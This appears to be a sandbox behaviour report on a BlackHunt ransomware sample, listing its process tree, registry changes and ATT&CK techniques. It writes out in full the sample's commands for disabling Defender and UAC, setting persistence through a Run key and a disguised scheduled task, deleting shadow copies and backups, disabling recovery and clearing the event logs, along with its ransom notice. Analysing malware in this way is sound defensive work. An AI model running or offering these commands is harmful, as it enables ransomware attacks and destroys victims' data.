1804 wrote to memory of 740 1804 schtasks.exe 193 PID 1804 wrote to memory of 740 1804 schtasks.exe 193 PID 3420 wrote to memory of 2392 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 120 PID 3420 wrote to memory of 2392 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 120 PID 468 wrote to memory of 2976 468 cmd.exe 182 PID 468 wrote to memory of 2976 468 cmd.exe 182 PID 3420 wrote to memory of 3292 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 123 PID 3420 wrote to memory of 3292 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 123 PID 3420 wrote to memory of 1040 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 133 PID 3420 wrote to memory of 1040 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 133 PID 2392 wrote to memory of 2204 2392 cmd.exe 166 PID 2392 wrote to memory of 2204 2392 cmd.exe 166 PID 3420 wrote to memory of 4072 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 135 PID 3420 wrote to memory of 4072 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 135 PID 2144 wrote to memory of 2748 2144 cmd.exe 184 PID 2144 wrote to memory of 2748 2144 cmd.exe 184 PID 3420 wrote to memory of 1896 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 136 PID 3420 wrote to memory of 1896 3420 ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe 136 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe"C:\Users\Admin\AppData\Local\Temp\ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2356
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe" /F3⤵
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3292
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4072
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4640
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4548
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4508
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2672
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2688
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1192
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1820
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:740
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1756
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4460
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:11792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11724
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:12600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11728
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:12928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:12296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:7116
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7888
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6652
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7100
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:14348
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7596
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:12740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12304
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:12664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:12356
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:12768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6920
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:12784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:12852
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:12416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:6764
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:12796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:12116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:12800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:12948
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:12616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:12752
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ac57be56a89079debf734715ce3535ad3997ffeea84e64cc85fa63a89476596a.exe"2⤵PID:12388
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:12376 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:12412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12412 -s 14644⤵
- Program crash
PID:9596
-
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:3384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:3836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:4056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵PID:3348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:968
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:4796
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:3348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2976
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1760
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7648
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13064
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 12412 -ip 124121⤵PID:13040
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
